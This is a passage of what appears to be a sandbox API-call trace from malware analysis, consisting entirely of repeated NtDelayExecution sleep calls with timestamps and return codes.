(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.137] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.160] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.165] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.185] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.251] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.276] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.591] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.597] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.600] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.652] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.751] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.754] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0130.792] NtDelayExecution 